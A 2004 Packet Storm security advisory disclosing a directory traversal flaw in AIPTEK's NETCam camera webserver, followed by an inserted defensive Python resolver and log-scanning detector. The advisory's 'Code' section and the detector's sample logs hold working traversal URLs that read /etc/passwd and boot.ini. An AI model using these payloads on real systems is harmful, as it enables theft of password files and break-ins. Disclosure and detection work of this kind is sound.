NETCam.txt

2004-01-21T00:00:00
ID PACKETSTORM:32534
Type packetstorm
Reporter Rafel Ivgi
Modified 2004-01-21T00:00:00

Description

#######################################################################  
  
Application: NETCam webserver running NETCam Viewer 1.0.0.28  
Vendor: http://www.aiptek.com/  
Versions: <= 1.0.0.28  
Platforms: Windows/Unix  
Bug: Directory traversal bug  
Risk: High  
Exploitation: remote with browser  
Date: 14 Jan 2003  
Author: Rafel Ivgi, The-Insider  
e-mail: the_insider@mail.com  
web: http://theinsider.deep-ice.com  
  
#######################################################################  
  
1) Introduction  
2) Bug  
3) The Code  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
AIPTEK's camera webserver is used for watching security cameras remotely.  
It broadcasts live streaming video on the web through the camera's built-in  
webserver.  
The server also allows live video capture.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
The webserver performs no checks that would prevent directory traversal.  
The problem occurs when an attacker uses the classic "/../" pattern, which  
allows him to view and download any file on the remote system whose path he  
knows.  
This lets any attacker read and download any local file and, in most cases,  
retrieve the machine's password files and break into it (using ssh, ftp,  
http, netbios, samba, etc.).  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
http://<host>/../etc/passwd  
http://<host>/../../etc/passwd  
http://<host>/../../../boot.ini  
http://<host>/../../../../boot.ini  
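The defensive counterpart to sections 2 and 3, as an added example that is not part of the advisory and not AIPTEK's code: a request-path resolver that refuses any path escaping the document root (the check the advisory says the NETCam webserver lacks), and a small detector that runs the same check over web-server log lines to surface traversal attempts like the URLs above. The document root `/srv/netcam/www`, the function names and the log lines are all assumptions constructed for this example.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical document root for the camera's built-in webserver (assumption).
DOCROOT = "/srv/netcam/www"


def resolve_under_root(url_path, docroot=DOCROOT):
    """Map a request path onto a filesystem path below docroot.

    Returns the resolved path, or None when the request would escape the
    document root (the "/../" pattern the advisory describes).  Each ".."
    segment is only honoured if there is a previous in-root segment to pop;
    a ".." at depth zero is an attempt to climb above the root and is refused
    rather than silently collapsed the way posixpath.normpath would do it.
    """
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None                      # embedded NUL is never a valid file name
    decoded = decoded.replace("\\", "/")  # treat Windows separators as "/"
    parts = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue                     # empty or current-dir segment: no-op
        if seg == "..":
            if not parts:
                return None              # would leave the document root
            parts.pop()
        else:
            parts.append(seg)
    root = posixpath.normpath(docroot)
    full = posixpath.normpath(posixpath.join(root, *parts)) if parts else root
    # Defence in depth: the final string must still sit under the root.
    if full != root and not full.startswith(root + "/"):
        return None
    return full


# Common-log-format request line, e.g.
# 192.0.2.10 - - [14/Jan/2004:10:00:00 +0000] "GET /../etc/passwd HTTP/1.0" 200 1188
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_traversal_requests(log_lines):
    """Return [(client, status, path)] for every parsable request whose decoded
    path would escape the document root according to resolve_under_root()."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # unparsable line: skip, do not crash
        client, _method, path, status = m.groups()
        if resolve_under_root(path) is None:
            hits.append((client, int(status), path))
    return hits


# Constructed sample log lines (not real data).  The traversal requests use the
# URL patterns listed in section 3; the in-root ".." on line two is legitimate.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2004:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [14/Jan/2004:10:00:02 +0000] "GET /img/../live.cgi HTTP/1.0" 200 9001',
    '198.51.100.7 - - [14/Jan/2004:10:00:03 +0000] "GET /../etc/passwd HTTP/1.0" 200 1188',
    '198.51.100.7 - - [14/Jan/2004:10:00:04 +0000] "GET /../../../boot.ini HTTP/1.0" 404 0',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for client, status, path in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt from %s (status %d): %s" % (client, status, path))
```

Note that a 200 status on a flagged request is the signal that the server actually served the file; on a patched server the same requests should show up as 403 or 404, so the detector is useful both for spotting probes and for confirming that a fix holds.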
  
#######################################################################  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Things that are unlikeable, are NOT impossible."  